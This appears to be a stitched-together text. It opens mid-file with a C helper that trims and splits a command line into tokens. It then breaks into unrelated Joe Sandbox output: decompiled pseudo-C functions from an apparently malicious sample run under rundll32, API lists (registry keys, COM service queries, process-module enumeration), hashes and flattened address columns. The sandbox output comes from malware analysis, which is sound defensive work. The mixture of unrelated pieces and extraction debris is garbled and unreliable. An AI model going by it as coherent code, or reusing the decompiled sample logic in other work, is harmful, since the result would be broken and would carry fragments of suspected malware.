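 * runs of separators collapse into a single cut. Labelled deviations: the
 * listing hands back only the array and always returns 0 (so a caller
 * cannot tell an allocation failure from success and must know the argument
 * count in advance); this version returns the count and NULL-terminates
 * the array. The function names are assumptions. */
static void trim_in_place(char *s, const char *set)
{
    size_t len = strlen(s);
    size_t start = 0;
    while (start < len && strchr(set, s[start]) != NULL)
        start++;
    size_t end = len;
    while (end > start && strchr(set, s[end - 1]) != NULL)
        end--;
    memmove(s, s + start, end - start);
    s[end - start] = '\0';
}

/* Splits s in place; *out receives a NULL-terminated array of pointers into s.
 * Returns the token count, or 0 with *out untouched if allocation fails. */
size_t split_args(char *s, char ***out)
{
    /* the listing's first loop: one slot per ' ' plus one */
    size_t slots = 1;
    for (const char *p = s; (p = strchr(p, ' ')) != NULL; p++)
        slots++;
    char **argv = calloc(slots + 1, sizeof *argv);  /* +1: terminator (deviation) */
    if (argv == NULL)
        return 0;

    trim_in_place(s, " \t");
    size_t n = 0;
    char *tok = s;
    do {
        char *hit = strchr(tok, ' ');
        if (hit != NULL) {
            *hit = '\0';                 /* terminate the current token */
            do {                         /* skip the separator run */
                hit++;
            } while (*hit == ' ' || *hit == '\t');
        }
        argv[n++] = tok;
        tok = hit;                       /* NULL after the last token */
    } while (tok != NULL);
    argv[n] = NULL;
    *out = argv;
    return n;
}

/* Runs the splitter on a constructed command line; returns 0 when every check holds. */
int split_demo(void)
{
    char line[] = "  cmd  arg1 \targ2 arg3  ";      /* constructed */
    char **argv = NULL;
    size_t n = split_args(line, &argv);
    if (argv == NULL)
        return 1;
    int ok = n == 4
          && strcmp(argv[0], "cmd") == 0 && strcmp(argv[1], "arg1") == 0
          && strcmp(argv[2], "arg2") == 0 && strcmp(argv[3], "arg3") == 0
          && argv[4] == NULL;
    free(argv);
    return ok ? 0 : 2;
}

int main(void)
{
    printf("split_demo: %s\n", split_demo() == 0 ? "ok" : "FAILED");
    return 0;
}
```

Note that a tab on its own does not split (only a space does; tabs are merely skipped after a cut), which is why "arg1 \targ2" yields two tokens while "a\tb" would remain one. The pointers returned alias the input string, as in the listing, so the string must outlive the array.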

                            C-Code - Quality: 64%
                            			E04A17928(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                            				intOrPtr _v36;
                            				intOrPtr _v44;
                            				intOrPtr _v48;
                            				intOrPtr _v52;
                            				void _v60;
                            				char _v64;
                            				long _t14;
                            				intOrPtr _t18;
                            				intOrPtr _t19;
                            				intOrPtr _t26;
                            				intOrPtr _t27;
                            				long _t28;
                            
                            				_t27 = __edi;
                            				_t26 = _a8;
                            				_t14 = E04A13F07(_a4, _t26, __edi); // executed
                            				_t28 = _t14;
                            				if(_t28 != 0) {
                            					memset( &_v60, 0, 0x38);
                            					_t18 =  *0x4a1a348; // 0xb1d5a8
                            					_t28 = 0;
                            					_v64 = 0x3c;
                            					if(_a12 == 0) {
                            						_t7 = _t18 + 0x4a1b4e0; // 0x70006f
                            						_t19 = _t7;
                            					} else {
                            						_t6 = _t18 + 0x4a1b8f4; // 0x750072
                            						_t19 = _t6;
                            					}
                            					_v52 = _t19;
                            					_push(_t28);
                            					_v48 = _a4;
                            					_v44 = _t26;
                            					_v36 = _t27;
                            					E04A123AA();
                            					_push( &_v64);
                            					if( *0x4a1a100() == 0) {
                            						_t28 = GetLastError();
                            					}
                            					_push(1);
                            					E04A123AA();
                            				}
                            				return _t28;
			}

			Statement address column (flattened by extraction; one address per statement above, 0x04a17928 through 0x04a179ab)

                            APIs
                              • Part of subcall function 04A13F07: SysAllocString.OLEAUT32(00000000), ref: 04A13F61
                              • Part of subcall function 04A13F07: SysAllocString.OLEAUT32(0070006F), ref: 04A13F75
                              • Part of subcall function 04A13F07: SysAllocString.OLEAUT32(00000000), ref: 04A13F87
                            • memset.NTDLL ref: 04A1794B
                            • GetLastError.KERNEL32 ref: 04A17997
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
• Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: AllocString$ErrorLastmemset
                            • String ID: <
                            • API String ID: 3736384471-4251816714
                            • Opcode ID: a9240a0832e6fd7052791814bc5cdf47415d664cdab30d6d87cc764324a5f291
                            • Instruction ID: 03625224b162338e912c205c8ac7c3223cbc784f7c17277b92aa81f7bdbe04d2
                            • Opcode Fuzzy Hash: a9240a0832e6fd7052791814bc5cdf47415d664cdab30d6d87cc764324a5f291
                            • Instruction Fuzzy Hash: 74014076D01218ABEB10EFA8D884FDEBBB8FB08744F444125F914E7260E734A905CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RegCreateKeyA.ADVAPI32(80000001,0631B7F0,?), ref: 04F7B7B9
                            • RegOpenKeyA.ADVAPI32(80000001,0631B7F0,?), ref: 04F7B7C3
                            • lstrlen.KERNEL32(0631B7F0,00000000,00000000,00000000,?,04F7A2EB,00000001,?,00000000,00000000,00000000,?,04F6109E,04F89F2C,00000008,00000003), ref: 04F7B7E2
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateOpenlstrlen
                            • String ID:
                            • API String ID: 2865187142-0
                            • Opcode ID: 6492793efbcaf6cb704ebd00307f24731a72d1ad24b700facee7a1adc1a8ffcf
                            • Instruction ID: 2d4d759c5e96c8116bf8a49d1c452c3f95b99994de8dd6b760a3ef80cca23850
                            • Opcode Fuzzy Hash: 6492793efbcaf6cb704ebd00307f24731a72d1ad24b700facee7a1adc1a8ffcf
                            • Instruction Fuzzy Hash: 02F09676100208BFE7159F51DC88FBA7B7CEB46798F10800AFD0689140D674BA82C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SetEvent.KERNEL32(000005BC,04F7C3DB), ref: 04F7E83B
                              • Part of subcall function 04F634FF: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,04F7E846), ref: 04F63528
                              • Part of subcall function 04F634FF: RtlDeleteCriticalSection.NTDLL(04F8A3E0), ref: 04F6355B
                              • Part of subcall function 04F634FF: RtlDeleteCriticalSection.NTDLL(04F8A400), ref: 04F63562
                              • Part of subcall function 04F634FF: ReleaseMutex.KERNEL32(000005C8,00000000,?,?,?,04F7E846), ref: 04F6358B
                              • Part of subcall function 04F634FF: CloseHandle.KERNEL32(?,?,04F7E846), ref: 04F63597
                              • Part of subcall function 04F634FF: ResetEvent.KERNEL32(00000000,00000000,?,?,?,04F7E846), ref: 04F635A3
                              • Part of subcall function 04F634FF: CloseHandle.KERNEL32(?,?,04F7E846), ref: 04F635AF
                              • Part of subcall function 04F634FF: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,04F7E846), ref: 04F635B5
                              • Part of subcall function 04F634FF: SleepEx.KERNEL32(00000064,00000001,?,?,04F7E846), ref: 04F635C9
                              • Part of subcall function 04F634FF: HeapFree.KERNEL32(00000000,00000000,?,?,04F7E846), ref: 04F635ED
                              • Part of subcall function 04F634FF: RtlRemoveVectoredExceptionHandler.NTDLL(04FC05B8), ref: 04F63623
                              • Part of subcall function 04F634FF: SleepEx.KERNEL32(00000064,00000001,?,?,04F7E846), ref: 04F6363F
                            • CloseHandle.KERNEL32(000005BC), ref: 04F7E850
                            • HeapDestroy.KERNELBASE(05F20000), ref: 04F7E860
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep$CloseHandle$CriticalDeleteEventHeapSection$DestroyExceptionFreeHandlerMutexReleaseRemoveResetVectored
                            • String ID:
                            • API String ID: 2773679374-0
                            • Opcode ID: 6a836c96b5cd502cbdff2ee1d071968e62e53e12484676f727f00bd4ad15b56d
                            • Instruction ID: bb738a8f81d151b08e04eea62ff4184ab302a5c033051b01c77e2713addc9ba2
                            • Opcode Fuzzy Hash: 6a836c96b5cd502cbdff2ee1d071968e62e53e12484676f727f00bd4ad15b56d
                            • Instruction Fuzzy Hash: 21E04C70E002496BDB205F75B84DA2637A9EB04741748146FA805DA140DA2CE845EA50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E04A12575(void* _a4, intOrPtr _a8, intOrPtr _a12) {
                            				int _v12;
                            				signed int _v16;
                            				void* _v20;
                            				signed char _v36;
                            				void* _t24;
                            				intOrPtr _t27;
                            				void* _t35;
                            				signed int _t38;
                            				signed char* _t46;
                            				int _t53;
                            				void* _t55;
                            				void* _t56;
                            				void* _t57;
                            
                            				_v16 = _v16 & 0x00000000;
                            				_t46 = _a4;
                            				_t53 = ( *_t46 & 0x000000ff) + 0x110;
                            				_v12 = 0x110;
                            				_t24 = E04A16D63(_t53);
                            				_a4 = _t24;
                            				if(_t24 != 0) {
                            					memcpy(_t24,  *0x4a1a378, 0x110);
                            					_t27 =  *0x4a1a37c; // 0x0
                            					_t57 = _t56 + 0xc;
                            					if(_t27 != 0) {
                            						_t51 = _a4;
                            						E04A1138A(0x110, _a4, _a4, _t27, 0);
                            					}
                            					if(E04A16BF2( &_v36) != 0) {
                            						_t35 = E04A15FBB(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed
                            						if(_t35 == 0) {
                            							_t55 = _v20;
                            							_v36 =  *_t46;
                            							_t38 = E04A113C7(_t55, _a8, _t51, _t46, _a12); // executed
                            							_v16 = _t38;
                            							 *(_t55 + 4) = _v36;
                            							memset(_t55, 0, _v12 - (_t46[4] & 0xf));
                            							_t57 = _t57 + 0xc;
                            							E04A16C2C(_t55);
                            						}
                            					}
                            					memset(_a4, 0, _t53);
                            					E04A16C2C(_a4);
                            				}
                            				return _v16;
                            			}
                            0x04a1257b
                            0x04a12580
                            0x04a1258d
                            0x04a12590
                            0x04a12593
                            0x04a12598
                            0x04a1259d
                            0x04a125ab
                            0x04a125b0
                            0x04a125b5
                            0x04a125ba
                            0x04a125bc
                            0x04a125c5
                            0x04a125c5
                            0x04a125d4
                            0x04a125e9
                            0x04a125f0
                            0x04a125f7
                            0x04a125fd
                            0x04a12603
                            0x04a1260b
                            0x04a12611
                            0x04a12621
                            0x04a12626
                            0x04a1262a
                            0x04a1262a
                            0x04a125f0
                            0x04a12635
                            0x04a12640
                            0x04a12640
                            0x04a1264c

                            APIs
                              • Part of subcall function 04A16D63: RtlAllocateHeap.NTDLL(00000000,00000000,04A15D7B), ref: 04A16D6F
                            • memcpy.NTDLL(00000000,00000110,?,?,?,?,?,?,?,04A14493,?), ref: 04A125AB
                            • memset.NTDLL ref: 04A12621
                            • memset.NTDLL ref: 04A12635
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: memset$AllocateHeapmemcpy
                            • String ID:
                            • API String ID: 1529149438-0
                            • Opcode ID: f4ef4829dcdf11d89ff930eba6f064080ff99b806f2d5ba3622cae9a7906bebe
                            • Instruction ID: 4676ad0fe5b4c3d862c621a112f9cb35b77cc148f00ee4b4962f998b1fffc05c
                            • Opcode Fuzzy Hash: f4ef4829dcdf11d89ff930eba6f064080ff99b806f2d5ba3622cae9a7906bebe
                            • Instruction Fuzzy Hash: 8C212F76A00518BBEF11AFA5CD40FEEBFB8EF48644F044055F914E6260E734EA118BA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 38%
                            			E04A11F7A(intOrPtr _a4) {
                            				void* _v12;
                            				char _v16;
                            				void* _v20;
                            				void* _v24;
                            				void* _v28;
                            				char _v32;
                            				intOrPtr _v40;
                            				void* _v46;
                            				short _v48;
                            				intOrPtr _t49;
                            				void* _t51;
                            				intOrPtr* _t53;
                            				intOrPtr _t56;
                            				void* _t58;
                            				intOrPtr* _t59;
                            				intOrPtr* _t61;
                            				intOrPtr* _t63;
                            				intOrPtr* _t65;
                            				intOrPtr* _t67;
                            				intOrPtr* _t69;
                            				intOrPtr* _t71;
                            				short _t73;
                            				intOrPtr* _t74;
                            				intOrPtr _t77;
                            				intOrPtr* _t80;
                            				intOrPtr _t82;
                            				char* _t98;
                            				intOrPtr _t100;
                            				void* _t106;
                            				void* _t108;
                            				intOrPtr _t112;
                            
                            				_v48 = 0;
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosw");
                            				_t49 =  *0x4a1a348; // 0xb1d5a8
                            				_t4 = _t49 + 0x4a1b448; // 0x55389f0
                            				_t82 = 0;
                            				_t5 = _t49 + 0x4a1b438; // 0x9ba05972
                            				_t51 =  *0x4a1a170(_t5, 0, 4, _t4,  &_v20); // executed
                            				_t106 = _t51;
                            				if(_t106 >= 0) {
                            					_t53 = _v20;
                            					_push( &_v12);
                            					_push(1);
                            					_push( &_v32);
                            					_push(8);
                            					_t98 =  &_v48;
                            					_push(_t98);
                            					_push(_t98);
                            					_push(_t53); // executed
                            					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) {
                            						_t56 =  *0x4a1a348; // 0xb1d5a8
                            						_t30 = _t56 + 0x4a1b428; // 0x55389d0
                            						_t31 = _t56 + 0x4a1b458; // 0x4c96be40
                            						_t58 =  *0x4a1a10c(_v12, _t31, _t30,  &_v24); // executed
                            						_t106 = _t58;
                            						_t59 = _v12;
                            						 *((intOrPtr*)( *_t59 + 8))(_t59);
                            						goto L11;
                            					} else {
                            						_t71 = _v20;
                            						_v16 = 0;
                            						_t106 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16);
                            						if(_t106 >= 0) {
                            							_t112 = _v16;
                            							if(_t112 == 0) {
                            								_t106 = 0x80004005;
                            								goto L11;
                            							} else {
                            								if(_t112 <= 0) {
                            									L11:
                            									if(_t106 >= 0) {
                            										goto L12;
                            									}
                            								} else {
                            									do {
                            										_t73 = 3;
                            										_v48 = _t73;
                            										_t74 = _v20;
                            										_v40 = _t82;
                            										_t108 = _t108 - 0x10;
                            										asm("movsd");
                            										asm("movsd");
                            										asm("movsd");
                            										asm("movsd");
                            										_t106 =  *((intOrPtr*)( *_t74 + 0x20))(_t74,  &_v12);
                            										if(_t106 < 0) {
                            											goto L7;
                            										} else {
                            											_t77 =  *0x4a1a348; // 0xb1d5a8
                            											_t23 = _t77 + 0x4a1b428; // 0x55389d0
                            											_t24 = _t77 + 0x4a1b458; // 0x4c96be40
                            											_t106 =  *0x4a1a10c(_v12, _t24, _t23,  &_v24);
                            											_t80 = _v12;
                            											 *((intOrPtr*)( *_t80 + 8))(_t80);
                            											if(_t106 >= 0) {
                            												L12:
                            												_t63 = _v24;
                            												_t106 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28);
                            												if(_t106 >= 0) {
                            													_t100 =  *0x4a1a348; // 0xb1d5a8
                            													_t67 = _v28;
                            													_t40 = _t100 + 0x4a1b418; // 0x214e3
                            													_t106 =  *((intOrPtr*)( *_t67))(_t67, _t40, _a4);
                            													_t69 = _v28;
                            													 *((intOrPtr*)( *_t69 + 8))(_t69);
                            												}
                            												_t65 = _v24;
                            												 *((intOrPtr*)( *_t65 + 8))(_t65);
                            											} else {
                            												goto L7;
                            											}
                            										}
                            										goto L15;
                            										L7:
                            										_t82 = _t82 + 1;
                            									} while (_t82 < _v16);
                            									goto L11;
                            								}
                            							}
                            						}
                            					}
                            					L15:
                            					_t61 = _v20;
                            					 *((intOrPtr*)( *_t61 + 8))(_t61);
                            				}
                            				return _t106;
                            			}
                            0x04a11f85
                            0x04a11f8c
                            0x04a11f8d
                            0x04a11f8e
                            0x04a11f8f
                            0x04a11f95
                            0x04a11f9a
                            0x04a11fa3
                            0x04a11fa6
                            0x04a11fad
                            0x04a11fb3
                            0x04a11fb7
                            0x04a11fbd
                            0x04a11fc5
                            0x04a11fc6
                            0x04a11fcb
                            0x04a11fcc
                            0x04a11fce
                            0x04a11fd1
                            0x04a11fd2
                            0x04a11fd3
                            0x04a11fd9
                            0x04a1206f
                            0x04a12074
                            0x04a1207b
                            0x04a12085
                            0x04a1208b
                            0x04a1208d
                            0x04a12093
                            0x00000000
                            0x04a11fdf
                            0x04a11fdf
                            0x04a11fe6
                            0x04a11fef
                            0x04a11ff3
                            0x04a11ff9
                            0x04a11ffc
                            0x04a12064
                            0x00000000
                            0x04a11ffe
                            0x04a11ffe
                            0x04a12096
                            0x04a12098
                            0x00000000
                            0x00000000
                            0x04a12004
                            0x04a12004
                            0x04a12006
                            0x04a1200b
                            0x04a1200f
                            0x04a12012
                            0x04a12017
                            0x04a1201f
                            0x04a12020
                            0x04a12021
                            0x04a12023
                            0x04a12027
                            0x04a1202b
                            0x00000000
                            0x04a1202d
                            0x04a12031
                            0x04a12036
                            0x04a1203d
                            0x04a1204d
                            0x04a1204f
                            0x04a12055
                            0x04a1205a
                            0x04a1209a
                            0x04a1209a
                            0x04a120a7
                            0x04a120ab
                            0x04a120b0
                            0x04a120b6
                            0x04a120bb
                            0x04a120c5
                            0x04a120c7
                            0x04a120cd
                            0x04a120cd
                            0x04a120d0
                            0x04a120d6
                            0x00000000
                            0x00000000
                            0x00000000
                            0x04a1205a
                            0x00000000
                            0x04a1205c
                            0x04a1205c
                            0x04a1205d
                            0x00000000
                            0x04a12062
                            0x04a11ffe
                            0x04a11ffc
                            0x04a11ff3
                            0x04a120d9
                            0x04a120d9
                            0x04a120df
                            0x04a120df
                            0x04a120e8

                            APIs
                            • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,055389D0,04A13F35,?,?,?,?,?,?,?,?,?,?,?,04A13F35), ref: 04A12047
                            • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,055389D0,04A13F35,?,?,?,?,?,?,?,04A13F35,00000000,00000000,00000000,006D0063), ref: 04A12085
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: QueryServiceUnknown_
                            • String ID:
                            • API String ID: 2042360610-0
                            • Opcode ID: 7e407b33dcca045724fc5a88acb18baaa3a4b952e9d4be2e61b639d6503f646c
                            • Instruction ID: 5d111fe86fbe6fdf14da50f66308a834ce1d7600a890bfbef3b4d886e901f501
                            • Opcode Fuzzy Hash: 7e407b33dcca045724fc5a88acb18baaa3a4b952e9d4be2e61b639d6503f646c
                            • Instruction Fuzzy Hash: 5E510276900619AFDB00DFE4C884EEEB7B9FF48710B058599E905EB260D731ED45CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 75%
                            			E04A146CB(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                            				void* _v8;
                            				void* __esi;
                            				intOrPtr* _t35;
                            				void* _t40;
                            				intOrPtr* _t41;
                            				intOrPtr* _t43;
                            				intOrPtr* _t45;
                            				intOrPtr* _t50;
                            				intOrPtr* _t52;
                            				void* _t54;
                            				intOrPtr* _t55;
                            				intOrPtr* _t57;
                            				intOrPtr* _t61;
                            				intOrPtr* _t65;
                            				intOrPtr _t68;
                            				void* _t72;
                            				void* _t75;
                            				void* _t76;
                            
                            				_t55 = _a4;
                            				_t35 =  *((intOrPtr*)(_t55 + 4));
                            				_a4 = 0;
                            				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                            				if(_t76 < 0) {
                            					L18:
                            					return _t76;
                            				}
                            				_t40 = E04A174FE(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                            				_t76 = _t40;
                            				if(_t76 >= 0) {
                            					_t61 = _a28;
                            					if(_t61 != 0 &&  *_t61 != 0) {
                            						_t52 = _v8;
                            						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                            					}
                            					if(_t76 >= 0) {
                            						_t43 =  *_t55;
                            						_t68 =  *0x4a1a348; // 0xb1d5a8
                            						_t20 = _t68 + 0x4a1b1fc; // 0x740053
                            						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                            						if(_t76 >= 0) {
                            							_t76 = E04A165D1(_a4);
                            							if(_t76 >= 0) {
                            								_t65 = _a28;
                            								if(_t65 != 0 &&  *_t65 == 0) {
                            									_t50 = _a4;
                            									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                            								}
                            							}
                            						}
                            						_t45 = _a4;
                            						if(_t45 != 0) {
                            							 *((intOrPtr*)( *_t45 + 8))(_t45);
                            						}
                            						_t57 = __imp__#6;
                            						if(_a20 != 0) {
                            							 *_t57(_a20);
                            						}
                            						if(_a12 != 0) {
                            							 *_t57(_a12);
                            						}
                            					}
                            				}
                            				_t41 = _v8;
                            				 *((intOrPtr*)( *_t41 + 8))(_t41);
                            				goto L18;
                            			}
                            0x04a146d1
                            0x04a146d4
                            0x04a146e4
                            0x04a146ed
                            0x04a146f1
                            0x04a147bf
                            0x04a147c5
                            0x04a147c5
                            0x04a1470b
                            0x04a14710
                            0x04a14714
                            0x04a1471a
                            0x04a1471f
                            0x04a14726
                            0x04a14735
                            0x04a14735
                            0x04a14739
                            0x04a1473b
                            0x04a14747
                            0x04a14752
                            0x04a1475d
                            0x04a14761
                            0x04a1476b
                            0x04a1476f
                            0x04a14771
                            0x04a14776
                            0x04a1477d
                            0x04a1478d
                            0x04a1478d
                            0x04a14776
                            0x04a1476f
                            0x04a1478f
                            0x04a14794
                            0x04a14799
                            0x04a14799
                            0x04a1479c
                            0x04a147a5
                            0x04a147aa
                            0x04a147aa
                            0x04a147af
                            0x04a147b4
                            0x04a147b4
                            0x04a147af
                            0x04a14739
                            0x04a147b6
                            0x04a147bc
                            0x00000000

                            APIs
                              • Part of subcall function 04A174FE: SysAllocString.OLEAUT32(80000002), ref: 04A1755B
                              • Part of subcall function 04A174FE: SysFreeString.OLEAUT32(00000000), ref: 04A175C1
                            • SysFreeString.OLEAUT32(?), ref: 04A147AA
                            • SysFreeString.OLEAUT32(04A13520), ref: 04A147B4
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: String$Free$Alloc
                            • String ID:
                            • API String ID: 986138563-0
                            • Opcode ID: c2b27cd6cc8f2f00a7209514b5b4ccdca0365f08a40304c0f7d07e8cecab5569
                            • Instruction ID: 57702a55c324fc48ae33c9bac9419260371cc0ce8f3be8a39c701a722701f5b0
                            • Opcode Fuzzy Hash: c2b27cd6cc8f2f00a7209514b5b4ccdca0365f08a40304c0f7d07e8cecab5569
                            • Instruction Fuzzy Hash: 49315CB5500119AFCB21DFA8C988C9BBBBAFFCE7507244658F9059B220D731ED51CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 50%
                            			E04A15634(intOrPtr* __eax, intOrPtr _a4) {
                            				void* _v8;
                            				void* _v12;
                            				void* _v16;
                            				intOrPtr* _t22;
                            				void* _t23;
                            				intOrPtr* _t24;
                            				intOrPtr* _t26;
                            				intOrPtr* _t28;
                            				intOrPtr* _t30;
                            				void* _t31;
                            				intOrPtr* _t32;
                            				intOrPtr _t42;
                            				intOrPtr _t45;
                            				intOrPtr _t48;
                            				void* _t51;
                            
                            				_push( &_v16);
                            				_t42 =  *0x4a1a348; // 0xb1d5a8
                            				_t2 = _t42 + 0x4a1b468; // 0x20400
                            				_push(0);
                            				_push(__eax);
                            				_t51 =  *((intOrPtr*)( *__eax + 0x3c))();
                            				if(_t51 >= 0) {
                            					_t22 = _v16;
                            					_t45 =  *0x4a1a348; // 0xb1d5a8
                            					_t6 = _t45 + 0x4a1b488; // 0xe7a1af80
                            					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t6,  &_v12); // executed
                            					_t51 = _t23;
                            					if(_t51 >= 0) {
                            						_t26 = _v12;
                            						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8);
                            						if(_t51 >= 0) {
                            							_t48 =  *0x4a1a348; // 0xb1d5a8
                            							_t30 = _v8;
                            							_t12 = _t48 + 0x4a1b478; // 0xa4c6892c
                            							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t12, _a4); // executed
                            							_t51 = _t31;
                            							_t32 = _v8;
                            							 *((intOrPtr*)( *_t32 + 8))(_t32);
                            						}
                            						_t28 = _v12;
                            						 *((intOrPtr*)( *_t28 + 8))(_t28);
                            					}
                            					_t24 = _v16;
                            					 *((intOrPtr*)( *_t24 + 8))(_t24);
                            				}
                            				return _t51;
                            			}

                            Instruction addresses from the decompiler view: 0x04a15640 0x04a15641 0x04a15647 0x04a1564e 0x04a15650 0x04a15654 0x04a15658 0x04a1565a 0x04a15663 0x04a15669 0x04a15671 0x04a15673 0x04a15677 0x04a15679 0x04a15686 0x04a1568a 0x04a1568f 0x04a15695 0x04a1569a 0x04a156a2 0x04a156a4 0x04a156a6 0x04a156ac 0x04a156ac 0x04a156af 0x04a156b5 0x04a156b5 0x04a156b8 0x04a156be 0x04a156be 0x04a156c5

                            APIs
                            • IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 04A15671
                            • IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 04A156A2
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: Interface_ProxyQueryUnknown_
                            • String ID:
                            • API String ID: 2522245112-0
                            • Opcode ID: 35c286f45087a5475a53c1236580c75b2ed86653bfdb3075508146f28feab54f
                            • Instruction ID: bfa78dfbf2f9c41ca44f12fbd6d256df0367c78d204209aa0c6b37588bc5f958
                            • Opcode Fuzzy Hash: 35c286f45087a5475a53c1236580c75b2ed86653bfdb3075508146f28feab54f
                            • Instruction Fuzzy Hash: 4D211F79A01619EFDB00DFA4C888D9AB779EFC9714B148684E915DB324D631ED41CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • EnumProcessModules.PSAPI(00000008,00000000,00001000,00000000,00001000,00000000,00000104,00000000,?), ref: 04F73253
                            • GetLastError.KERNEL32(00000008,00000000,00001000,00000000,00001000,00000000,00000104,00000000), ref: 04F7329A
                              • Part of subcall function 04F7E803: RtlFreeHeap.NTDLL(00000000,?,04F73953,?,?,04F7BF5B,00000000,00000000,04F610B0,00000000,04F89F2C,00000008,00000003), ref: 04F7E80F
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
